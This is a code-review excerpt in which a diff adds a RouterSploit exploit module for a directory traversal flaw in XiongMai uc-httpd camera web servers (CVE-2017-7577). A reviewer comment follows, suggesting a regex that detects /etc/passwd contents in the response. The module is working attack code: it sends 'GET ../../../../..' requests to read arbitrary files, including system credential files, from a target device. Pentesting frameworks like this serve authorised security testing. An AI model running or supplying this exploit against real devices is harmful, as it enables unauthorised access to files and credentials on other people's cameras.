routersploit/modules/exploits/cameras/xiongmai/uc-httpd_lfi.py

```diff
@@ -0,0 +1,53 @@
+from routersploit import (
+    exploits,
+    print_error,
+    print_info,
+    print_success,
+    http_request,
+    mute,
+    validators
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    XiongMai uc-httpd has directory traversal allowing the reading of arbitrary files via a "GET ../" HTTP request.
+    """
+    __info__ = {
+        'name': 'uc-httpd Directory Traversal',
+        'description': 'XiongMai uc-httpd has directory traversal allowing the reading of arbitrary files via a "GET ../" HTTP request.',
+        'authors': [
+            'keksec',  # vulnerability discovery
+            'GH0st3rs',  # routersploit module
+        ],
+        'references': [
+            'https://packetstormsecurity.com/files/142131/uc-httpd-directory-traversal.txt',
+            'https://www.cvedetails.com/cve/CVE-2017-7577/'
+        ],
+        'devices': [
+            'Xiongmai Technologies app: Uc-httpd 1.0.0',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+    file = exploits.Option('', 'Target file path')
+
+    def __init__(self):
+        self.content = None
+
+    def run(self):
+        if self.check():
+            print_success("Target seems to be vulnerable")
+            print_info(self.content)
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        url = "{}:{}/../../../../..{}".format(self.target, self.port, self.file)
+        response = http_request(method="GET", url=url)
+        if response is not None and "404" not in response.text:
```

Comment:
Add something more specific that should be found in the response. Downloading /etc/passwd will return content in a standard format. You can use regexp: `re.match("(root|[aA]dmin):.*?:.*?:.*?:.*?:.*?:", response.text)`

```python
if response and re.match("(root|[aA]dmin):.*?:.*?:.*?:.*?:.*?:", response.text):
```